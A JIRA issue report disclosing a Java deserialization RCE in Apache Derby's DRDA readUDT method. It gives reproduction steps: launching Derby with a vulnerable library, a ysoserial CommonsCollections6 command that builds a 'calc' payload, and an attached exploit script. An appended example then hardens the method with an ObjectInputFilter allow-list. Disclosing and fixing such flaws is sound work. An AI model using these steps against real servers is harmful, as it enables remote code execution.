[ https://issues.apache.org/jira/browse/DERBY-6993?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Ricter Zheng updated DERBY-6993:
--------------------------------

Description:

In `src\java\drda\org\apache\derby\impl\drda\DRDAConnThread.java`:

{code:java}
/** Read a UDT from the stream */
private Object readUDT() throws DRDAProtocolException
{
    int length = reader.readNetworkShort(); // protocol control data always follows big endian
    if (SanityManager.DEBUG) { trace("===== udt param length is: " + length); }
    byte[] bytes = reader.readBytes(length);

    try {
        ByteArrayInputStream bais = new ByteArrayInputStream( bytes );
        ObjectInputStream ois = new ObjectInputStream( bais );
        return ois.readObject();
    }
    catch (Exception e)
    {
        markCommunicationsFailure
            ( e,"DRDAConnThread.readUDT()", "", e.getMessage(), "*" );
        return null;
    }
}
{code}

`return ois.readObject();` causes a deserialization vulnerability.

Launch Derby with a vulnerable Java library on the classpath and the `-noSecurityManager` option:

{code}
"C:\Program Files\Java\jdk1.8.0_144\bin\java.exe" -classpath "C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derby.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbynet.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyclient.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbytools.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyoptionaltools.jar;..\lib\commons-collections.jar" org.apache.derby.drda.NetworkServerControl start -noSecurityManager
{code}

Generate a Java deserialization payload using ysoserial:

{code}
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 calc > /path/to/exp.py/payload.data
{code}

Then run the script in the attachment, which will execute `calc`.

{code}
python exp.py
{code}

!image-2018-03-27-11-42-23-176.png!
> Derby Deserialization Vulnerability Leads to RCE
> ------------------------------------------------
>
>                 Key: DERBY-6993
>                 URL: https://issues.apache.org/jira/browse/DERBY-6993
>             Project: Derby
>          Issue Type: Bug
>    Affects Versions: 10.14.1.0
>         Environment: Windows 10
>            Reporter: Ricter Zheng
>            Priority: Major
>         Attachments: image-2018-03-27-11-42-23-176.png
>

--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
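A defensive counterpart to the `readUDT()` quoted in the description, added here as an example; it is not Derby's code and not the project's eventual fix. It keeps the same read path but installs a JDK 9+ `java.io.ObjectInputFilter` allow-list, so that only the UDT classes the server expects can be instantiated from the stream (the report's JDK 8 runtime predates this API). `ExampleUdt`, the filter pattern and the byte/depth limits are assumptions chosen for the demonstration.

```java
import java.io.*;

/**
 * Added example, not Derby's code: the UDT read path from readUDT(), hardened with a
 * JDK 9+ java.io.ObjectInputFilter allow-list. Unexpected classes are rejected when their
 * class descriptor is read, before any constructor or readObject() of theirs can run.
 */
public class HardenedUdtReader {

    /** Constructed stand-in for a user-defined type the server legitimately expects. */
    public static class ExampleUdt implements Serializable {
        private static final long serialVersionUID = 1L;
        public final String label;
        public ExampleUdt(String label) { this.label = label; }
    }

    /** Allow-list (assumed): exact names of expected UDTs plus java.lang.*; "!*" rejects all else. */
    private static final ObjectInputFilter UDT_FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=8;maxrefs=256;maxbytes=65536;"          // resource limits on the object graph
            + ExampleUdt.class.getName() + ";java.lang.*;!*");

    /** Replacement for the body of readUDT(): bytes are the result of reader.readBytes(length). */
    public static Object readUDT(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.setObjectInputFilter(UDT_FILTER); // must be set before the first readObject()
            return ois.readObject();
        }
    }

    /** Demo helper: Java-serialize an object the way a DRDA client would send a UDT parameter. */
    public static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(baos)) { oos.writeObject(o); }
        return baos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // An expected UDT passes the filter and is reconstructed.
        ExampleUdt ok = (ExampleUdt) readUDT(serialize(new ExampleUdt("point")));
        System.out.println("accepted: " + ok.label);

        // Any other class in the stream is refused with InvalidClassException (filter status REJECTED).
        try {
            readUDT(serialize(new java.util.ArrayList<String>()));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The filter is the check that is missing in the original: without it, `ObjectInputStream.readObject()` will instantiate whatever class the peer names in the stream, which is what the ysoserial payload in the report relies on.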